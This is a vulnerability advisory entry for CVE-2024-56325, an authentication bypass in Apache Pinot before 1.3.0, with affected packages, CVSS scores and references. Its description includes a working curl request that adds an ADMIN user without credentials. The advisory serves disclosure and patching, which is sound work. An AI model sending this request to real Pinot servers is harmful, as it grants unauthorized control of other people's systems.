CVE-2024-56325
CRITICAL9.8EPSS 17.4%Apache Pinot Vulnerable to Authentication Bypass
Description
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Affected packages (3)
- Maven/org.apache.pinot:pinot-brokerfrom 0, < 1.3.0
- Maven/org.apache.pinot:pinot-commonfrom 0, < 1.3.0
- Maven/org.apache.pinot:pinot-controllerfrom 0, < 1.3.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
References (7)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2024-56325
- PATCHhttps://github.com/apache/pinot
- WEBhttps://github.com/apache/pinot/commit/1b87488aeaf4836e3ef25b426ebbf1ad5a68e68f
- WEBhttps://github.com/apache/pinot/pull/14383
- WEBhttps://github.com/apache/pinot/releases/tag/release-1.3.0
- WEBhttps://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
- WEBhttp://www.openwall.com/lists/oss-security/2025/03/27/8